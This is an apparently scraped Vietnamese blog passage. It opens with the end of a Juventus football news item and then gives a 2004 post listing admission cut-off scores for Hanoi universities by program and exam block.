<br />Theo Del Piero, Juve chơi tốt kể từ đầu mùa là nhờ có hàng thủ chắc chắn. ''Việc chỉ để lọt lưới 2 bàn cho thấy chúng tôi chơi hết sức tập trung. Ngoài ra cũng phải kể đến HLV Capello, người đã mang đến một phương pháp huấn luyện mới cho Juve tạo sự hưng phấn cho toàn đội'', anh nói. Hiện Juve được 22 điểm, hơn Milan 5 điểm, cách Inter 10 điểm và bỏ xa Roma đến 13 điểm. Thế nhưng, tiền đạo số 10 khẳng định: ''Chúng tôi không nhìn vào bảng xếp hạng. Mục tiêu của Juve là giữ được nhiệt huyết mỗi khi vào sân''.
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-1089643834529569222004-08-14T03:10:00.000+02:002006-10-18T10:16:39.763+02:00Điểm chuẩn vào các trường Đại Học năm 2004ĐH Bách khoa Hà Nội:
<br />khối A: 23 điểm,
<br />khối D: 26 điểm (tiếng Anh nhân hệ số 2).
<br />Tuyển 100% chỉ tiêu NV1
<br />
<br />Trường ĐH Sư phạm Hà Nội: trường tuyển 100% NV1 đối với tất cả các ngành, trừ ngành SP tiếng Pháp còn chỉ tiêu xét tuyển NV2.
<br />
<br />Điểm tuyển NV1 các ngành của ĐH Sư phạm HN cụ thể như sau: SP toán: 25,5, SP Tin học: 20, SP Vật lý: 23, SP Kỹ thuật: 19, SP Hoá học: 25, SP sinh- Kỹ thuật nông nghiệp: 25, SP Ngữ văn: khối C: 24, khối D: 20, SP Lịch sử: khối C: 24,5, khối D: 20,5, SP Địa lý: khối C: 23,5, khối A: 20, SP Tâm lý giáo dục: 18,5, SP giáo dục chính trị: khối C: 22, khối D: 18
<br />
<br />SP tiếng Anh: 27 (ngoại ngữ nhân hệ số 2), SP tiếng Pháp: 22,5 (ngoại ngữ nhân hệ số 2), SP Âm nhạc: 31 (một môn năng khiếu nhân hệ số 2), SP Mỹ thuật: 26 (một môn năng khiếu nhân hệ số 2)
<br />
<br />SP Thể dục thể thao: 27 (một môn năng khiếu nhân hệ số 2), SP TDTT- Giáo dục quốc phòng: 26,5 (một môn nhân hệ số 2), SP Giáo dục mầm non: 20, SP Giáo dục tiểu học: 21, SP Giáo dục đặc biệt: 17, Công nghệ thông tin: 17,5, Việt Nam học: 18.
<br />
<br />Học viện Tài chính cho biết trường tuyển hết 100% chỉ tiêu bằng NV1. Điểm chuẩn của trường là 22 điểm.
<br />
<br />Trường ĐH Luật Hà Nội cho biết trường tuyển 100% chỉ tiêu cả hai khối A và C bằng NV1. Điểm chuẩn của khối C là 20,5, khối A là 16,5.
<br />
<br />Học viện Công nghệ bưu chính viễn thông (cơ sở phía Bắc) cho biết trường sẽ tuyển hết 100% chỉ tiêu từ NV1. Điểm chuẩn của các ngành như sau: Kỹ thuật điện tử viễn thông: 23, công nghệ thông tin: 22, quản trị kinh doanh Bưu chính viễn thông: 21,5.
<br />
<br />ĐH Kinh tế quốc dân: Điểm sàn của trường đồng thời là điểm trúng tuyển của 5 ngành là 21,5. Đó là các ngành: Kinh tế, Quản trị kinhdoanh, Hệ thống thông tin kinh tế và Luật học, Khoa học máy tính.
<br />
<br />
<br />
<br />Ngành Ngân hàng - Tài chính có điểm chuẩn là 22,5 và ngành Kế toán có điểm chuẩn cao nhất với mức 25,5. Đây là mức điểm đối với học sinh THPT khu vực 3.
<br />
<br />
<br />
<br />Với những thí sinh đã dự thi vào trường ĐH Kinh tế quốc dân và trượt hai ngành Ngân hàng - Tài chính, Kế toán nhưng lại có mức điểm từ điểm sàn của trường (21,5) trở lên thì được xét tuyển vào năm ngành còn lại. Thí sinh liên hệ với trường để biết thông tin cụ thể.
<br />
<br />
<br />
<br />ĐH Dược Hà Nội: Mức điểm chuẩn đối với học sinh THPT khu vực 3 là 23,5.
<br />
<br />
<br />
<br />ĐH Giao thông Vận tải Hà Nội: tuyển 100% nguyện vọng 1 với mức điểm
<br /> 22 đối với cơ sở phía Bắc (ở Hà Nội) và
<br /> 15,5 với cơ sở phía Nam (ở TP.HCM).
<br />
<br />
<br />
<br />ĐH Dân lập Thăng Long dành điểm chuẩn cho cả 2 khối A và D là 15. Trường sẽ xét tuyển 900 chỉ tiêu NV2 với mức điểm xét tuyển là 16.
<br />Học viện An ninh Nhân dân
<br />
<br /> Tin học: 23,5; An ninh điều tra A: 25; An ninh điều tra C: 20; Tiếng Anh (đã nhân hệ số): 27,5; Tiếng Trung (đã nhân hệ số): 25,5
<br />
<br />
<br />
<br />Học viện Ngân hàng: 21
<br />
<br />
<br />
<br />ĐH Y tế công cộng: 21,5
<br />
<br />
<br />
<br />ĐH Nông nghiệp Hà Nội 1:
<br />
<br />Khối A: 18 -
<br />Khối B: 19,5
<br />
<br />
<br />
<br />ĐH Vinh
<br />
<br /> * Các ngành đào tạo ĐH Sư phạm
<br />
<br />Toán học: 20,5;
<br />Tin học: 19;
<br />Vật lý: 20;
<br />Hoá học,
<br />Sinh học: 22,5
<br />
<br />
<br />
<br />Giáo dục chính trị: 19,5; Ngữ văn: 21,5; Lịch sử: 22; Địa lý: 23; Tiếng Anh: 24 (đã nhân hệ số 2); Tiếng Pháp: 20 (đã nhân hệ số 2)
<br />
<br />
<br />
<br />Giáo dục tiểu học khối A: 19; Giáo dục tiểu học khối C: 20,5; Giáo dục mầm non: 15 (môn năng khiếu tối thiểu từ 4 trở lên)
<br />
<br />
<br />
<br />Thể dục thể thao: 23 (mỗi môn văn hoá tối thiểu từ 3 trở lên); Thể dục thể thao - Giáo dục quốc phòng: 20 (mỗi môn văn hoá tối thiểu từ 3 trở lên)
<br />
<br />
<br />
<br />* Các ngành đào tạo cử nhân khoa học
<br />
<br />Toán, Tin học, Vật lý, Hóa, Kinh tế quản trị kinh doanh, Kế toán: 15 Sinh, Sử, Văn: 16
<br />Tiếng Anh: 20 (đã nhân hệ số)
<br />
<br />
<br />
<br />* Các ngành đào tạo kỹ sư
<br />
<br />Xây dựng dân dụng và công nghiệp: 19
<br />Công nghệ thông tin; Điện tử-Viễn thông: 15
<br />Nuôi trồng thủy sản: 18,5
<br />Nông học: 18
<br />
<br />ĐH Xây dựng đã quyết định mức điểm chuẩn vào trường năm nay. Mức điểm này thấp hơn năm 2003.
<br /> Cụ thể: khối A: 21,
<br /> khối V: 25.
<br />
<br />Học viện Quan hệ quốc tế:
<br /> Học tiếng Anh: 22,
<br /> tiếng Pháp: 20,
<br /> tiếng Trung: 21
<br />
<br />ĐH Phòng cháy chữa cháy:
<br /> cơ sở phía Bắc: 21,5;
<br /> cơ sở phía Nam: 15,5
<br />
<br /> ĐH Thương mại đã công bố điểm trúng tuyển vào các ngành, theo bảng dưới đây:
<br />
<br /> Ngành Điểm chuẩn
<br />
<br /> Kinh tế 20
<br /> Kế toán 21
<br /> QTKD, Khách sạn - Du lịch 16
<br /> QT DN thương mại 18,5
<br /> Thương mại quốc tế 16,5
<br /> Marketing 17
<br />
<br /> ĐH Kiến trúc Hà Nội:
<br />
<br /> Ngành Điểm chuẩn
<br /> Kiến trúc (101) 20,5
<br /> Quy hoạch (102) 19,5
<br /> Xây dựng (103) 24,5
<br /> Cấp thoát nước (104) 20,5
<br /> Môi trường (105) 20
<br />
<br />Đây là mức điểm đối với học sinh THPT khu vực 3. Điểm chênh lệch giữa các khu vực là 0,5 điểm. Điểm chênh lệch giữa các nhóm đối tượng ưu tiên là 1 điểm
<br />
<br />Thông tin trên được trích từ mạng: www.Tintucvietnam.com/
<br />
<br />Người post bài: Duykham
<br />Unknownnoreply@blogger.com1